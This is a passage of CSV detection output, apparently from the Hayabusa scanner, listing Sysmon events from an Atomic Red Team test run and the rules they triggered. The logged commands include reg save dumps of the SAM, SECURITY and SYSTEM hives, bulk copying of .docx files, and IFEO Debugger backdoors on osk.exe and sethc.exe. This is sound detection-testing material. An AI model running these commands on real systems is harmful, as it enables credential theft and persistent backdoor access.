Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.937 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.937 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.990 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 
747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.990 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.059 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.059 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.147 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 
0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.175 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.175 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.251 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 
747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.251 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.303 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.331 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.331 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.375 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.392 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.392 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.559 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.572 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 
747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.572 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.619 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.619 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.632 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:33.632 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.229 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.229 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.255 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:39.255 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.660 
+00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.691 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:41.691 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:43.569 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection 
Command Prompt,,rules/sigma/process_creation_sysmon/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:51.996 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation_sysmon/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.048 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.053 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 14:49:52.210 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:52.275 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.174 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.194 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" 
| LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.220 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:02.249 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.279 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.299 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.322 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.322 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
14:50:07.322 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:07.357 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.266 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d 